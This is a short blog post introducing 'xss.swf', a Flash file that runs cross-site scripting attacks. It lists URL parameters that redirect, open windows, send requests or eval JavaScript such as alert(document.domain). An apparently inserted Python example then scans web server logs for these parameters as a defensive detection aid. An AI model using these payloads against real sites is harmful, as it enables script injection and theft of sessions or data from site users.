XSS using a Flash SWF
oneandonlyme
2014. 3. 20. 13:19
a tiny tool for swf hacking, just browse it:)
param&value:
a(action) - c(cmd)
1. location to url: xss.swf?a=location&c=http://www.google.com/
2. open url to new window: xss.swf?a=open&c=http://www.google.com/
3. http request to url: xss.swf?a=get&c=http://www.google.com/
4. eval js codz: xss.swf?a=eval&c=alert(document.domain)
--------------------------------------------------------------------------------
localhost/xss.swf?a=location&c=http://www.google.com/
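For defenders, the a/c parameter scheme listed above is a simple signature to hunt for in web server access logs. The following is an added example, not part of the original post or of the xss.swf project; the combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Actions from the parameter list above (a=location|open|get|eval).
KNOWN_ACTIONS = {"location", "open", "get", "eval"}

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_request(target):
    """Return (action, cmd) if target matches the a/c scheme on a .swf, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".swf"):
        return None
    # parse_qs percent-decodes values; keep blanks so an empty "c=" is still seen.
    params = parse_qs(parts.query, keep_blank_values=True)
    cmds = params.get("c", [])
    for action in (a.lower() for a in params.get("a", [])):
        if action in KNOWN_ACTIONS and cmds:
            return action, cmds[0]
    return None

def scan_log(lines):
    """Return [(line_number, action, cmd), ...] for every matching request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        hit = classify_request(match.group(1)) if match else None
        if hit:
            hits.append((number, *hit))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Mar/2014:13:19:00 +0900] "GET /xss.swf?a=location&c=http://www.google.com/ HTTP/1.1" 200 1024',
    '203.0.113.5 - - [20/Mar/2014:13:19:05 +0900] "GET /upload/Banner.SWF?a=eval&c=alert%28document.domain%29 HTTP/1.1" 200 1024',
    '198.51.100.7 - - [20/Mar/2014:13:20:11 +0900] "GET /player.swf?file=intro.flv HTTP/1.1" 200 2048',
    '198.51.100.7 - - [20/Mar/2014:13:20:30 +0900] "GET /index.html?a=eval&c=1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, action, cmd in scan_log(SAMPLE_LOG):
        print(f"line {number}: action={action} cmd={cmd!r}")
```

The match relies on the a/c parameter names, so it is a hunting aid for this scheme, not a general detector for scriptable SWF files.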
※ Source
https://github.com/evilcos/xss.swf
※ References
http://panchocosil.blogspot.kr/2013/07/swf-file-preview-at-googlegroupscom.html
http://donncha.is/2013/06/coinbase-owning-a-bitcoin-exchange-bug-bounty-program/
http://erlend.oftedal.no/blog/?blogid=99
http://www.exploit-db.com/